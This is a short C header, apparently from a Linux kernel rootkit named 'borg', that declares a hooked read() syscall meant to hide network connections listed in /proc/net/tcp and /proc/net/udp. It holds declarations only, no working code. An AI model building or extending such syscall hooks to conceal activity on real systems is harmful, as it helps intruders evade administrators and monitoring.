/**
 * @file read.h
 * @brief Hides entries from /proc/net/tcp(6) and /proc/net/udp(6).
 */
#ifndef __BORG_READ_H
#define __BORG_READ_H

#include <linux/types.h>

/** Original read(). */
extern asmlinkage int (*original_read)(int, void *, size_t);

/**
 * Borged read().
 * @param fd File descriptor to read.
 * @param buf Buffer to write to.
 * @param count Maximum size to write.
 * @return Number of bytes read.
 */
extern asmlinkage int borg_read(int fd, void *buf, size_t count);

#endif
